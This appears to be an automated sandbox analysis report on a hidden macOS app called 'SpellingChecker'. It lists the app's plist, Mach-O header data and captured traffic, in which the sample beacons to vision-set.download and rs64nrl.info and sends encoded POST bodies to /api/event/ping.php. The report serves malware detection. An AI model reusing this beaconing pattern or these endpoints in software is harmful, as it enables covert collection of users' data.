              Property List File:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>BuildMachineOSBuild</key><string>17E160e</string><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>SpellingChecker</string><key>CFBundleIdentifier</key><string>com.spelling.checker.Agent</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundleName</key><string>SpellingChecker</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>1.22</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>22</string><key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string><key>DTPlatformBuild</key><string>9C40b</string><key>DTPlatformVersion</key><string>GM</string><key>DTSDKBuild</key><string>17C76</string><key>DTSDKName</key><string>macosx10.13</string><key>DTXcode</key><string>0920</string><key>DTXcodeBuild</key><string>9C40b</string><key>LSApplicationCategoryType</key><string></string><key>LSMinimumSystemVersion</key><string>10.10</string><key>LSUIElement</key><true/><key>NSAppTransportSecurity</key><dict><key>NSAllowsArbitraryLoads</key><true/></dict><key>NSHumanReadableCopyright</key><string>Copyright 2018 SpellingChecker. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>NSPrincipalClass</key><string>NSApplication</string></dict></plist>

              Resources

              NameType
              Info.plistXML document text
              PkgInfoASCII text, with no line terminators
              SpellingCheckerMach-O 64-bit executable
              MainMenu.nibApple binary property list
              CodeResourcesXML document text
              Info.plistXML document text
              PkgInfoASCII text, with no line terminators
              SpellingCheckerMach-O 64-bit executable
              MainMenu.nibApple binary property list
              CodeResourcesXML document text

              Static Mach Info

              General Informations for header0

              Endian:<
              Size:64-bit
              Architecture:x86_64
              Filetype:execute
              Nbr. of load commands:23
              segment_command_64
              NameValue
              segname__PAGEZERO
              fileoff0
              maxprot0
              vmsize4294967296
              nsects0
              flags0
              filesize0
              vmaddr0
              initprot0
              segment_command_64
              NameValue
              segname__TEXT
              fileoff0
              maxprot7
              vmsize110592
              nsects10
              flags0
              filesize110592
              vmaddr4294967296
              initprot5
              Datassectname__text
              segname__TEXT
              reloff0
              addr4294973108
              align0
              nreloc0
              flags2147484672
              offset5812
              reserved20
              reserved10
              reserved30
              size85048
              sectname__stubs
              segname__TEXT
              reloff0
              addr4295058156
              align1
              nreloc0
              flags2147484680
              offset90860
              reserved26
              reserved10
              reserved30
              size564
              sectname__stub_helper
              segname__TEXT
              reloff0
              addr4295058720
              align2
              nreloc0
              flags2147484672
              offset91424
              reserved20
              reserved10
              reserved30
              size956
              sectname__cstring
              segname__TEXT
              reloff0
              addr4295059676
              align0
              nreloc0
              flags2
              offset92380
              reserved20
              reserved10
              reserved30
              size5889
              sectname__objc_methname
              segname__TEXT
              reloff0
              addr4295065565
              align0
              nreloc0
              flags2
              offset98269
              reserved20
              reserved10
              reserved30
              size5036
              sectname__objc_classname
              segname__TEXT
              reloff0
              addr4295070601
              align0
              nreloc0
              flags2
              offset103305
              reserved20
              reserved10
              reserved30
              size163
              sectname__objc_methtype
              segname__TEXT
              reloff0
              addr4295070764
              align0
              nreloc0
              flags2
              offset103468
              reserved20
              reserved10
              reserved30
              size1380
              sectname__gcc_except_tab
              segname__TEXT
              reloff0
              addr4295072144
              align2
              nreloc0
              flags0
              offset104848
              reserved20
              reserved10
              reserved30
              size5312
              sectname__const
              segname__TEXT
              reloff0
              addr4295077456
              align4
              nreloc0
              flags0
              offset110160
              reserved20
              reserved10
              reserved30
              size24
              sectname__unwind_info
              segname__TEXT
              reloff0
              addr4295077480
              align2
              nreloc0
              flags0
              offset110184
              reserved20
              reserved10
              reserved30
              size408
              segment_command_64
              NameValue
              segname__DATA
              fileoff110592
              maxprot7
              vmsize20480
              nsects18
              flags0
              filesize20480
              vmaddr4295077888
              initprot3
              Datassectname__nl_symbol_ptr
              segname__DATA
              reloff0
              addr4295077888
              align3
              nreloc0
              flags6
              offset110592
              reserved20
              reserved194
              reserved30
              size16
              sectname__got
              segname__DATA
              reloff0
              addr4295077904
              align3
              nreloc0
              flags6
              offset110608
              reserved20
              reserved196
              reserved30
              size240
              sectname__la_symbol_ptr
              segname__DATA
              reloff0
              addr4295078144
              align3
              nreloc0
              flags7
              offset110848
              reserved20
              reserved1126
              reserved30
              size752
              sectname__const
              segname__DATA
              reloff0
              addr4295078896
              align3
              nreloc0
              flags0
              offset111600
              reserved20
              reserved10
              reserved30
              size96
              sectname__cfstring
              segname__DATA
              reloff0
              addr4295078992
              align3
              nreloc0
              flags0
              offset111696
              reserved20
              reserved10
              reserved30
              size6848
              sectname__objc_classlist
              segname__DATA
              reloff0
              addr4295085840
              align3
              nreloc0
              flags268435456
              offset118544
              reserved20
              reserved10
              reserved30
              size56
              sectname__objc_nlclslist
              segname__DATA
              reloff0
              addr4295085896
              align3
              nreloc0
              flags268435456
              offset118600
              reserved20
              reserved10
              reserved30
              size8
              sectname__objc_catlist
              segname__DATA
              reloff0
              addr4295085904
              align3
              nreloc0
              flags268435456
              offset118608
              reserved20
              reserved10
              reserved30
              size8
              sectname__objc_protolist
              segname__DATA
              reloff0
              addr4295085912
              align3
              nreloc0
              flags0
              offset118616
              reserved20
              reserved10
              reserved30
              size32
              sectname__objc_imageinfo
              segname__DATA
              reloff0
              addr4295085944
              align2
              nreloc0
              flags0
              offset118648
              reserved20
              reserved10
              reserved30
              size8
              sectname__objc_const
              segname__DATA
              reloff0
              addr4295085952
              align3
              nreloc0
              flags0
              offset118656
              reserved20
              reserved10
              reserved30
              size5592
              sectname__objc_selrefs
              segname__DATA
              reloff0
              addr4295091544
              align3
              nreloc0
              flags268435461
              offset124248
              reserved20
              reserved10
              reserved30
              size1504
              sectname__objc_protorefs
              segname__DATA
              reloff0
              addr4295093048
              align3
              nreloc0
              flags0
              offset125752
              reserved20
              reserved10
              reserved30
              size16
              sectname__objc_classrefs
              segname__DATA
              reloff0
              addr4295093064
              align3
              nreloc0
              flags268435456
              offset125768
              reserved20
              reserved10
              reserved30
              size232
              sectname__objc_ivar
              segname__DATA
              reloff0
              addr4295093296
              align3
              nreloc0
              flags0
              offset126000
              reserved20
              reserved10
              reserved30
              size8
              sectname__objc_data
              segname__DATA
              reloff0
              addr4295093304
              align3
              nreloc0
              flags0
              offset126008
              reserved20
              reserved10
              reserved30
              size640
              sectname__data
              segname__DATA
              reloff0
              addr4295093944
              align3
              nreloc0
              flags0
              offset126648
              reserved20
              reserved10
              reserved30
              size480
              sectname__bss
              segname__DATA
              reloff0
              addr4295094432
              align4
              nreloc0
              flags1
              offset0
              reserved20
              reserved10
              reserved30
              size768
              segment_command_64
              NameValue
              segname__LINKEDIT
              fileoff131072
              maxprot7
              vmsize24576
              nsects0
              flags0
              filesize23152
              vmaddr4295098368
              initprot1
              dyld_info_command
              NameValue
              lazy_bind_size2496
              lazy_bind_off133176
              weak_bind_size0
              rebase_size296
              export_off135672
              export_size32
              bind_off131368
              rebase_off131072
              bind_size1808
              weak_bind_off0
              symtab_command
              NameValue
              strsize3200
              symoff135928
              stroff139208
              nsyms150
              dysymtab_command
              NameValue
              extreloff0
              nlocrel0
              indirectsymoff138328
              modtaboff0
              nextrel0
              iundefsym2
              nmodtab0
              ilocalsym0
              nundefsym148
              nextrefsyms0
              locreloff0
              ntoc0
              nlocalsym1
              tocoff0
              extrefsymoff0
              nindirectsyms220
              iextdefsym1
              nextdefsym1
              dylinker_command
              NameValue
              name12
              Data/usr/lib/dyld
              uuid_command
              NameValue
              uuidbf8a858cda863731950093ba2d5e4c5e
              version_min_command
              NameValue
              version657920
              reserved658688
              source_version_command
              NameValue
              version0
              entry_point_command
              NameValue
              stacksize0
              entryoff10551
              dylib_command
              NameValue
              compatibility_version0.44.1
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version3840.170.5
              Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
              dylib_command
              NameValue
              compatibility_version0.1.0
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version0.228.0
              Data/usr/lib/libobjc.A.dylib
              dylib_command
              NameValue
              compatibility_version0.1.0
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version0.228.4
              Data/usr/lib/libSystem.B.dylib
              dylib_command
              NameValue
              compatibility_version0.150.0
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version3840.170.5
              Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
              dylib_command
              NameValue
              compatibility_version0.1.0
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version4864.54.3
              Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
              dylib_command
              NameValue
              compatibility_version0.1.0
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version0.19.1
              Data/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
              dylib_command
              NameValue
              compatibility_version0.1.0
              timestampThu Jan 01 01:00:02 1970
              name24
              current_version7681.195.3
              Data/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
              rpath_command
              NameValue
              path12
              Data@executable_path/../Frameworks
              linkedit_data_command
              NameValue
              dataoff135704
              datassize224
              linkedit_data_command
              NameValue
              dataoff135928
              datassize0
              linkedit_data_command
              NameValue
              dataoff142416
              datassize11808

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Okt 3, 2018 14:12:20.368386984 MESZ5841953192.168.0.508.8.8.8
              Okt 3, 2018 14:12:20.405252934 MESZ53584198.8.8.8192.168.0.50
              Okt 3, 2018 14:12:20.407042027 MESZ4923580192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.432302952 MESZ8049235195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:20.432744026 MESZ4923580192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.435791969 MESZ4923580192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.461236000 MESZ8049235195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:20.461371899 MESZ8049235195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:20.461550951 MESZ4923580192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.464737892 MESZ4923680192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.487715006 MESZ8049236195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:20.487932920 MESZ4923680192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.488446951 MESZ4923680192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.511671066 MESZ8049236195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:20.511811018 MESZ8049236195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:20.512022972 MESZ4923680192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:20.528991938 MESZ4926553192.168.0.508.8.8.8
              Okt 3, 2018 14:12:20.560709000 MESZ53492658.8.8.8192.168.0.50
              Okt 3, 2018 14:12:20.561582088 MESZ4923780192.168.0.50163.172.60.125
              Okt 3, 2018 14:12:20.584357023 MESZ8049237163.172.60.125192.168.0.50
              Okt 3, 2018 14:12:20.584553003 MESZ4923780192.168.0.50163.172.60.125
              Okt 3, 2018 14:12:20.585050106 MESZ4923780192.168.0.50163.172.60.125
              Okt 3, 2018 14:12:20.607774973 MESZ8049237163.172.60.125192.168.0.50
              Okt 3, 2018 14:12:20.608927965 MESZ8049237163.172.60.125192.168.0.50
              Okt 3, 2018 14:12:20.609133959 MESZ4923780192.168.0.50163.172.60.125
              Okt 3, 2018 14:12:21.006465912 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.032002926 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.032253981 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.032751083 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.033561945 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.057768106 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.058928013 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.064258099 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.064476967 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.068537951 MESZ4923980192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.094711065 MESZ8049239195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.094913006 MESZ4923980192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.095313072 MESZ4923980192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.120892048 MESZ8049239195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.121130943 MESZ8049239195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.121359110 MESZ4923980192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.124125957 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.149065971 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.149282932 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.149861097 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.175211906 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.175479889 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.175589085 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.175760031 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.175822020 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.175872087 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.175980091 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.176088095 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.176131010 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.176142931 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.176201105 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.176275015 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.176309109 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.176417112 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.176460981 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.176531076 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.176618099 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.176630020 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.201268911 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.201314926 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.201514006 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.201586008 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.201602936 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.201623917 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.201790094 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.201827049 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.201901913 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202009916 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.202008963 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202150106 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202205896 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.202229977 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202341080 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202406883 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.202450037 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202517986 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.202559948 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202667952 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202694893 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.202779055 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202869892 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.202888012 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.202997923 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.203037977 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.203104973 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.203191042 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.203216076 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.203289032 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.226723909 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.226769924 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.226977110 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227087975 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227144003 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227168083 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227202892 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227310896 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227334976 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227475882 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227507114 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227582932 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227694035 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227727890 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227799892 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.227896929 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227909088 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.227966070 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228066921 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228179932 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228229046 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.228297949 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228341103 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.228398085 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228509903 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228535891 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.228614092 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.228622913 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228729963 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228800058 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.228838921 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228893995 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:21.228971004 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:21.229055882 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.303474903 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.303718090 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.328821898 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.336076975 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.336282969 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.337944984 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.338150978 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.363127947 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.364283085 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.364473104 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.367214918 MESZ4923780192.168.0.50163.172.60.125
              Okt 3, 2018 14:12:24.367216110 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.367216110 MESZ4923980192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.367217064 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.367218018 MESZ4923680192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.367221117 MESZ4923580192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.389642954 MESZ8049237163.172.60.125192.168.0.50
              Okt 3, 2018 14:12:24.389909029 MESZ4923780192.168.0.50163.172.60.125
              Okt 3, 2018 14:12:24.390078068 MESZ8049236195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.390259981 MESZ4923680192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.392165899 MESZ8049238195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.392318010 MESZ8049240195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.392337084 MESZ4923880192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.392494917 MESZ8049235195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.392519951 MESZ4924080192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.392657042 MESZ4923580192.168.0.50195.154.31.197
              Okt 3, 2018 14:12:24.392959118 MESZ8049239195.154.31.197192.168.0.50
              Okt 3, 2018 14:12:24.393166065 MESZ4923980192.168.0.50195.154.31.197

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Okt 3, 2018 14:12:20.368386984 MESZ5841953192.168.0.508.8.8.8
              Okt 3, 2018 14:12:20.405252934 MESZ53584198.8.8.8192.168.0.50
              Okt 3, 2018 14:12:20.528991938 MESZ4926553192.168.0.508.8.8.8
              Okt 3, 2018 14:12:20.560709000 MESZ53492658.8.8.8192.168.0.50

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Okt 3, 2018 14:12:20.368386984 MESZ192.168.0.508.8.8.80xcb7Standard query (0)vision-set.downloadA (IP address)IN (0x0001)
              Okt 3, 2018 14:12:20.528991938 MESZ192.168.0.508.8.8.80x4d81Standard query (0)rs64nrl.infoA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
              Okt 3, 2018 14:12:20.405252934 MESZ8.8.8.8192.168.0.500xcb7No error (0)vision-set.download195.154.31.197A (IP address)IN (0x0001)
              Okt 3, 2018 14:12:20.560709000 MESZ8.8.8.8192.168.0.500x4d81No error (0)rs64nrl.info163.172.60.125A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • vision-set.download
              • rs64nrl.info

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination Port
              0192.168.0.5049235195.154.31.19780
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:20.435791969 MESZ0OUTGET /hello.txt HTTP/1.1
              Host: vision-set.download
              Accept: */*
              Accept-Language: en-us
              Connection: keep-alive
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:20.461371899 MESZ1INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:20 GMT
              Content-Type: text/plain
              Content-Length: 5
              Last-Modified: Sat, 23 Jun 2018 20:45:31 GMT
              Connection: keep-alive
              ETag: "5b2eb16b-5"
              Accept-Ranges: bytes
              Data Raw: 77 6f 72 6c 64
              Data Ascii: world


              Session IDSource IPSource PortDestination IPDestination Port
              1192.168.0.5049236195.154.31.19780
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:20.488446951 MESZ1OUTGET /hello.txt HTTP/1.1
              Host: vision-set.download
              Accept: */*
              Accept-Language: en-us
              Connection: keep-alive
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:20.511811018 MESZ1INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:20 GMT
              Content-Type: text/plain
              Content-Length: 5
              Last-Modified: Sat, 23 Jun 2018 20:45:31 GMT
              Connection: keep-alive
              ETag: "5b2eb16b-5"
              Accept-Ranges: bytes
              Data Raw: 77 6f 72 6c 64
              Data Ascii: world


              Session IDSource IPSource PortDestination IPDestination Port
              2192.168.0.5049237163.172.60.12580
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:20.585050106 MESZ2OUTGET /readautoip.php?prefix=upd: HTTP/1.1
              Host: rs64nrl.info
              Accept: */*
              Accept-Language: en-us
              Connection: keep-alive
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:20.608927965 MESZ3INHTTP/1.1 404 Not Found
              Server: nginx/1.9.15
              Date: Wed, 03 Oct 2018 12:12:20 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Access-Control-Allow-Origin: *
              Content-Encoding: gzip
              Data Raw: 32 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 4e ad 54 c8 cb 2f 51 48 cb 2f cd 4b 51 04 00 c6 30 55 ce 0e 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 22NT/QH/KQ0U0


              Session IDSource IPSource PortDestination IPDestination Port
              3192.168.0.5049238195.154.31.19780
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:21.032751083 MESZ3OUTPOST /api/event/ping.php HTTP/1.1
              Host: vision-set.download
              Content-Type: text/plain
              Connection: keep-alive
              X-Sig: 9d367d4a3ad24b5a591135355f3e9c86
              Accept: */*
              Accept-Language: en-us
              Content-Length: 664
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:21.033561945 MESZ4OUTData Raw: 53 7a 6f 51 45 42 4a 46 51 31 56 43 58 6c 46 64 56 52 49 51 43 68 41 53 57 46 56 65 51 6b 6b 53 48 44 6f 51 45 42 4a 41 51 6c 39 55 52 56 4e 45 59 46 78 5a 51 30 52 2b 55 56 31 56 45 68 41 4b 45 42 49 53 48 44 6f 51 45 42 4a 52 52 68 49 51 43 68
              Data Ascii: SzoQEBJFQ1VCXlFdVRIQChASWFVeQkkSHDoQEBJAQl9URVNEYFxZQ0R+UV1VEhAKEBISHDoQEBJRRhIQChASEhw6EBASQ0VSb1lUEhAKEBISHDoQEBJGXRIQChAAHDoQEBJTWVRvX0QSEAoQABw6EBASQEYSEAoQABw6EBASU1hRXl5VXBIQChASEhw6EBASU1MSEAoQEn11Ehw6EBASU1lUflVHEhAKEAAcOhAQEkBCX1RFU0R
              Okt 3, 2018 14:12:21.064258099 MESZ5INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:21 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d ce 41 0b c2 20 18 80 e1 bf 34 21 0f 1d 3a a8 7c 86 1b 0c 9c fa 69 1d 67 4e 41 a9 4b 30 e9 d7 57 97 e8 fe bc f0 9a 3e 5a d7 d5 04 f7 f9 00 65 37 28 9b 80 fc 30 97 81 63 90 fd 1a da ed e5 25 5a df 55 84 ca a3 77 33 ac 84 2e 01 9d 11 65 b4 81 0c 49 ff 6c 4c 8e 14 74 e4 89 ba d0 8e 04 d3 c2 ff ba 8f d3 ad 6d c8 d5 c4 72 64 8c ef 26 b4 a3 0d a8 8d c8 2c 42 a3 9b ae 98 56 22 cf df 07 a8 c3 e9 0d 3e 61 e5 7d a0 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 96MA 4!:|igNAK0W>Ze7(0c%ZUw3.eIlLtmrd&,BV">a}0
              Okt 3, 2018 14:12:24.303474903 MESZ65OUTPOST /api/event/ping.php HTTP/1.1
              Host: vision-set.download
              Content-Type: text/plain
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              X-Sig: 285c03db2374dd9d8f7102356e9b09e6
